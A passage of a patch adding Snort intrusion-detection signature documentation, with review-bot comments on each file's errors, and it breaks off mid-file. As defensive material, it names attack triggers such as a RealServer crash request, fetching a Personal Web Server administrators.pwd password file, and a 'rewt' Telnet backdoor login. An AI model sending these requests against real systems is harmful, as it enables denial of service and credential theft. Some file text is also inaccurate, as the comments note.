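Review bot: the file never states what request the rule matches (every section is generic web-server text), so it gives an analyst nothing to triage a sid 1522 event with; add the URI or string the rule looks for to Summary and Detailed Information, and fill in Additional References. Minor: "attackers choosing" should be "attacker's choosing".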
--- /dev/null
+++ b/doc/signatures/1411.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1411
+
+--
+
+Summary:
+This event is generated when an SNMP connection over UDP using the 
+default 'public' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'public' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
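Review bot: Detailed Information says implementations "come pre-configured with 'public' and 'public' communities"; the second should be 'private', as Corrective Action says. False Positives "None known." is wrong for this rule: any management station still polling with the default 'public' community (the same paragraph notes many implementations ship with it) will trigger the event, so note that and recommend excluding authorised monitoring hosts from the rule. "SNMP (Simple Network Management Protocol) v1 uses communities" also applies to v2c; say "v1 and v2c".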
--- /dev/null
+++ b/doc/signatures/900.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+900
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
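Review bot: Affected Systems is empty; either list the platforms or state that any web, web application or FTP server that does not validate requested paths is affected, as Detailed Information implies. Attack Scenarios only covers FTP ("browse folders outside the ftp root directory") while Detailed Information also covers web servers and applications; cover both. Additional References is empty.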
--- /dev/null
+++ b/doc/signatures/1765.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1765
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
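Review bot: the file does not say which CGI application or request string the rule matches, so an analyst cannot distinguish a sid 1765 event from any other generic CGI alert; add the matched URI to Summary and Detailed Information and fill in Additional References. Typo: "ona web server" should be "on a web server".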
--- /dev/null
+++ b/doc/signatures/3073.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3073
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"subscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
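Review bot: "An attacker can supplied an overly long command" should be "can supply", and "a buffer overflow associated with the several commands" should be "with several commands". Contributors has a missing space in "Brian Caswell<bmc@sourcefire.com>". Additional References is empty although the issue is pinned to Mercury Mail Transport System 3.32 and 4.01a; add the advisory.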
--- /dev/null
+++ b/doc/signatures/2065.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2065
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6841
+
+--
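Review bot: the Summary is truncated; "file on a Lotus Domino Server." has lost the start of its sentence, so the leading clause describing the request (per Detailed Information and Attack Scenarios, an HTTP request for a script file with a dot appended to the filename) needs restoring. Also "None Known" should be "None known" for consistency with the other files.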
--- /dev/null
+++ b/doc/signatures/1331.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1331
+
+--
+Summary:
+Attempted uname command access via web
+
+--
+Impact:
+Attempt to gain information on the host operating system using the uname
+command.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the operating system being
+used on a webserver. uname is a UNIX command that will return
+information about the operating system, the machine's architecture, the
+processor architecture and the version level of the software being used.
+This information is valuable to an attacker who can use it to plan
+further attacks based on possible vulnerabilities in the machine's
+operating system.
+
+Using "uname -a", the attackers might be able to gain accurate
+intelligence on the web server platform. The rule looks for the "uname"
+command in the URL part of the client to web server connection and does
+not indicate whether the command was actually successful in showing the
+system information. The presence of the "uname" command in the URL
+indicates that an attacker attempted to trick the web server into
+executing system commands in non-interactive mode i.e. without a valid
+shell session. Another case when this rule might trigger is unencrypted
+HTTP tunneling connection to the server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'uname' in
+the URI which can then return the machine's operating system environment
+architecture.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. This command may also be
+requested on a command line should the attacker gain access to the machine. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+man uname
+
+--
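Review bot: the Affected Systems section is missing. False Positives "None Known" is doubtful: Detailed Information says the rule "looks for the "uname" command in the URL part" of the request, so any URL containing that string for another reason, such as a form field named uname, will also trigger it; note this. Also "outside of it's designated web root" should be "its", and the Corrective Action sentence "This command may also be requested on a command line should the attacker gain access to the machine" is not a corrective action and belongs in Attack Scenarios if it is kept at all.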
--- /dev/null
+++ b/doc/signatures/1957.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1957
+
+--
+Summary:
+This event is generated when an attempt is made to ping the Remote Procedure Call (RPC) sadmind.
+
+
+--
+Impact:
+Intelligence gathering activity.  The sadmind ping will verify if the daemon is running.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite applications to perform remote distributed system administration tasks such as adding new users.  The ping function associated with the sadmind daemon will verify if it is active. 
+
+--
+Affected Systems:
+All systems running sadmind.
+
+--
+Attack Scenarios:
+An attacker can ping the sadmind daemon to verify if it is active.  There are several exploits associated with this daemon.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/866
+
+--
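Review bot: "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" reads backwards; it should say that access from untrusted networks to RPC services on these hosts (the portmapper and the port sadmind registers) is denied. Attack Scenarios says "several exploits" exist but only BID 866 is referenced; add the others or qualify the statement.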
--- /dev/null
+++ b/doc/signatures/2944.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2944
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
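Review bot: Impact "Serious." says nothing about the effect; state it, which Detailed Information already gives as denial of service of the target host. Attack Scenarios "The attacker may gain complete control over the affected system" is not supported by the rest of the file, which documents a shutdown request; cut it. False Positives should note that remote shutdown over SMB is a routine administrative action, so the event also fires on legitimate use. The Corrective Action item "Disallow remote registry manipulation" needs a sentence explaining why it is relevant to a shutdown request, since the file does not say.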
--- /dev/null
+++ b/doc/signatures/276.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+276
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed 
+request for a page on a RealNetworks RealServer port, which can indicate
+a Denial of Service (DoS) attack on the RealServer.
+
+--
+Impact:
+The RealNetworks RealServer service will crash.
+
+--
+Detailed Information:
+RealNetworks RealServer is a server application that serves streaming 
+audio to clients. When an attacker sends a request for a template file 
+in the /viewsource/ directory with an empty variable value, RealServer 
+crashes.   
+
+--
+Affected Systems:
+Systems running RealNetworks RealServer 7.0 with View Source 
+functionality enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request for /viewsource/template.html? on a 
+RealServer audio server. RealServer crashes, stopping audio 
+transmission.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software or disable the View Source 
+functionality. The vendor has issued an advisory, workarounds, and 
+downloadable patches at http://service.real.com/help/faq/servgviewsrc.html.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RealNetworks
+http://service.real.com/help/faq/servgviewsrc.html
+
+
+--
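Review bot: Additional References only repeats the vendor FAQ URL already given in Corrective Action and carries no Bugtraq or CVE entry; for a DoS with a public vendor advisory, add the tracking identifier if one exists rather than listing the same link twice. Minor: the actual trigger (the empty query string in "/viewsource/template.html?") appears only in Attack Scenarios, while Detailed Information says just "an empty variable value"; repeating the concrete request there makes the rule easier to understand.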
--- /dev/null
+++ b/doc/signatures/3135.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3135
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
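Review bot: Corrective Action does not match the attack direction given in Detailed Information. The vulnerability is triggered by "a malicious response from a server in response to a client request using SMB", so the Windows SMB client is the target, and "Turn off windows file and print services." and "Use Samba as an alternative." are server-side measures that do not protect the vulnerable client. Suggest: apply the vendor patch, and block outbound SMB (TCP 139/445) to untrusted networks so clients cannot be lured to a hostile server. The Impact wording "unauthorized administrative access to the target host" should likewise say the client host, and "windows" should be capitalized.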
--- /dev/null
+++ b/doc/signatures/953.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+953
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+Microsoft Personal Server administration information.
+
+--
+
+Impact:
+If successful, the attacker can log into the system and modify web 
+content, as well as modify other users' credentials.
+
+--
+
+Detailed Information:
+On systems running Microsoft Personal Web Server the file 
+administrators.pwd contains usernames and encrypted passwords for users 
+who can author contents and administer this server. The attacker can 
+guess the exact URL of this file and request it, hence gaining this 
+information.
+
+--
+
+Affected Systems:
+Certain versions of Microsoft Windows 95 or Windows 98 running Frontpage
+1.1 or Frontpage 98 Server Extensions. Windows NT installations are not 
+affected.
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering 
+the exact URL, and gain access to the system after cracking the 
+passwords found in the file.
+
+--
+
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the Personal Web Server.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1205/info/
+
+
+
+
+--
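Review bot: Summary calls the product "Microsoft Personal Server" while Detailed Information correctly says "Microsoft Personal Web Server"; use the full name in both places. Corrective Action offers only "Disable the Personal Web Server."; since the problem described is that administrators.pwd can be fetched from a guessable URL, a less drastic option (remove the file from the web root or deny web access to it, and check the Bugtraq entry under Additional References for a vendor fix) belongs here too. The run of four empty "+" lines before the closing "--" is inconsistent with the other files in this patch.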
--- /dev/null
+++ b/doc/signatures/1846.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1846
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
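Review bot: the Summary is a sentence fragment: "This event is generated when network traffic indicating the use of an application or service that may violate a corporate security policy." has no main verb; read "when network traffic indicates the use of ...". More importantly, nothing in the file says which application or service sid 1846 matches, so an analyst seeing the alert has nothing to judge it against; name the protocol or application and the pattern the rule keys on, and describe the legitimate uses of it under False Positives, where "None known." is unlikely to hold for a policy rule. "corporate policy" at the end of Corrective Action also lacks a full stop.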
--- /dev/null
+++ b/doc/signatures/2647.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2647
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_online" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck631.html
+
+--
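Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is a Snort sensor configuration instruction, not vulnerability detail; move it to its own paragraph or to Corrective Action and say what the rule uses $ORACLE_PORTS for, so the reader understands why the setting matters. "a Oracle" in the Summary should be "an Oracle". The vulnerable procedure "instantiate_online" is named without its package, whereas 2740.txt and 2722.txt in this same patch name dbms_repcat for theirs; do the same here. Additional References points only to a third-party policy page; add the Oracle alert or CVE if available.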
--- /dev/null
+++ b/doc/signatures/3381.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3381
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
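Review bot: "Expoit" in Ease of Attack should be "Exploit". The Attack Scenarios paragraph ("a request for a file with an overly long filename via a network share") does not connect to Detailed Information, which describes malformed data sent to an RPC port; state how the long filename reaches the DCOM interface (the RPC request that carries it), otherwise the reader cannot tell whether to watch ports 135/139/445 or file shares. Additional References is empty for a well-known Microsoft vulnerability; cite the vendor bulletin. Finally, this text is identical to 3345.txt and 3386.txt in the same patch; each file should say what distinguishes its rule (transport, interface or opcode matched), or the three should share one entry.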
--- /dev/null
+++ b/doc/signatures/2740.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2740
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_raw
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
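Review bot: the line break inside "vulnerability in the procedure alter_priority_raw" / ". This procedure is included in" / "dbms_repcat." is a template artefact that leaves the full stop at the start of a line; join it into one sentence. "Oracle Oracle9i" repeats the vendor name. Corrective Action "Apply the appropriate vendor supplied patch" lacks a full stop, and Additional References is empty; the rule would be easier to triage with the Oracle alert or CVE number for the dbms_repcat overflows.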
--- /dev/null
+++ b/doc/signatures/691.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
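Review bot: the Sid field is empty even though the file is 691.txt; fill it in, since the documentation is keyed on it. Detailed Information contains "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit.", which is copied from a telnet-rule template and has nothing to do with an SQL command; drop it. Attack Scenarios reads "Simple. These are SQL database commands.", which is Ease of Attack text rather than a scenario, and there is no Affected Systems section. The file also never says which command the rule matches, which is exactly what the False Positives paragraph (a DBA issuing commands from outside) depends on.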
--- /dev/null
+++ b/doc/signatures/212.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+212
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "rewt".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
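Review bot: Detailed Information ends mid-thought: "This Trojan affects UNIX operating systems:" introduces nothing. Either complete the list or drop the colon. The file refers to "this Trojan" throughout but never says what "rewt" is or which backdoor uses it as a login name, so the Summary is the only clue an analyst gets; add that, plus the missing Affected Systems section. "Use SSH as opposed to Telnet for access from external locations" lacks a full stop.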
--- /dev/null
+++ b/doc/signatures/100000806.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000806
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "search.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
